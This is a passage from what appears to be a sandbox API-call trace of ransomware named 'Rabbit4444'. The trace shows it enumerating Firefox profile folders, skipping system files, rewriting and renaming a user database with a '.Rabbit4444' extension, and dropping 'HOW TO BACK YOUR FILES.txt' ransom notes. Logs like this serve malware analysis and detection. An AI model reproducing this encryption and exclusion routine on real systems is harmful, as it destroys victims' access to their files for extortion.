ftCreationTime.dwLowDateTime=0xe85263ac, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe85263ac, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe854c286, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.019] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.019] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.019] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e680c0, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x2e680c0, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x2e680c0, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2918063365piupsah.files", cAlternateFileName="291806~1.FIL")) returned 1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="Rabbit4444.exe") returned -1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2=".") returned 1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="..") returned 1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="windows") returned -1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="bootmgr") returned -1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="pagefile.sys") returned -1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="boot") returned -1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="ids.txt") returned -1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.files", lpString2="NTUSER.DAT") returned -1 [0052.019] lstrcpyW (in: lpString1=0x130ec06, lpString2="2918063365piupsah.files" | out: lpString1="2918063365piupsah.files") returned="2918063365piupsah.files" [0052.019] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0052.019] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xfe) returned 0x10c928 [0052.019] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6930 [0052.019] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246c9b2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x246c9b2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x4714894, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0xc000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2918063365piupsah.sqlite", cAlternateFileName="291806~1.SQL")) returned 1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="Rabbit4444.exe") returned -1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2=".") returned 1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="..") returned 1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="windows") returned -1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="bootmgr") returned -1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="pagefile.sys") returned -1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="boot") returned -1 [0052.019] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="ids.txt") returned -1 [0052.020] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="NTUSER.DAT") returned -1 [0052.020] lstrcpyW (in: lpString1=0x130ec06, lpString2="2918063365piupsah.sqlite" | out: lpString1="2918063365piupsah.sqlite") returned="2918063365piupsah.sqlite" [0052.020] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite", dwFileAttributes=0x0) returned 1 [0052.020] lstrlenW (lpString="2918063365piupsah.sqlite") returned 24 [0052.020] lstrlenW (lpString="Rabbit4444") returned 10 [0052.020] lstrcmpiW (lpString1="sah.sqlite", lpString2="Rabbit4444") returned 1 [0052.020] lstrlenW (lpString=".dll") returned 4 [0052.020] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0052.020] lstrlenW (lpString=".lnk") returned 4 [0052.021] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0052.021] lstrlenW (lpString=".ini") returned 4 [0052.021] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0052.021] lstrlenW (lpString=".sys") returned 4 [0052.021] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0052.021] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.021] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.021] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14333162417) returned 1 [0052.021] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=49152) returned 1 [0052.021] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0052.021] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0052.021] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc300, lpName=0x0) returned 0x298 [0052.022] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc300) returned 0x70000 [0052.026] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10ca30 [0052.026] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0052.026] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10ca30 | out: hHeap=0xe0000) returned 1 [0052.026] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0052.026] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x119df0 [0052.026] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0052.026] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119df0 | out: hHeap=0xe0000) returned 1 [0052.026] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0052.026] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14333691864) returned 1 [0052.026] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0052.026] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0052.026] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.027] CloseHandle (hObject=0x298) returned 1 [0052.027] CloseHandle (hObject=0x278) returned 1 [0052.027] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite.Rabbit4444") returned 138 [0052.027] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite.rabbit4444"), dwFlags=0x1) returned 1 [0052.028] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246c9b2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x246c9b2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x4714894, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0xc000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2918063365piupsah.sqlite", cAlternateFileName="291806~1.SQL")) returned 0 [0052.028] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0052.028] lstrcpyW (in: lpString1=0x130ec06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.028] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.029] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.029] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.030] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.030] CloseHandle (hObject=0x278) returned 1 [0052.030] CloseHandle (hObject=0x27c) returned 1 [0052.030] GetCurrentThreadId () returned 0xd98 [0052.030] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0052.030] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files" [0052.031] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.031] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0052.031] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files" [0052.031] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\" [0052.031] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\.BFC0E91B00AE8A0620D3" [0052.031] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.032] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.034] FlushFileBuffers (hFile=0x27c) returned 1 [0052.035] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.035] CloseHandle (hObject=0x27c) returned 1 [0052.035] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned 126 [0052.035] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.036] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e680c0, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x2e680c0, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe8572607, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0052.036] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.036] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.036] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.036] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.036] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e680c0, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x2e680c0, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe8572607, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.036] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.036] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.036] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.036] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.036] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.036] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8572607, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8572607, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8572607, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.036] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.036] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.036] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8572607, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8572607, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8572607, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.036] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0052.036] lstrcpyW (in: lpString1=0x130ec36, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.036] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.037] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.037] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.037] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.037] CloseHandle (hObject=0x278) returned 1 [0052.037] CloseHandle (hObject=0x27c) returned 1 [0052.037] GetCurrentThreadId () returned 0xd98 [0052.037] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6930 [0052.037] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups" [0052.037] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.037] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6928 | out: hHeap=0xe0000) returned 1 [0052.037] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups" [0052.037] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\" [0052.037] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\.BFC0E91B00AE8A0620D3" [0052.037] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.040] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.043] FlushFileBuffers (hFile=0x27c) returned 1 [0052.043] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.044] CloseHandle (hObject=0x27c) returned 1 [0052.044] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups") returned 94 [0052.044] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.044] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6368e07, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb7ea601f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe8572607, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0052.044] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.044] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.044] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.044] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.044] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6368e07, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb7ea601f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe8572607, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.044] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.044] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.044] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.044] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.044] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.045] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8572607, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8572607, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8572607, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.045] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.045] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.045] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd3e77da, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xcd3e77da, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xcd3e77da, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x1f37, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="previous.js", cAlternateFileName="")) returned 1 [0052.045] 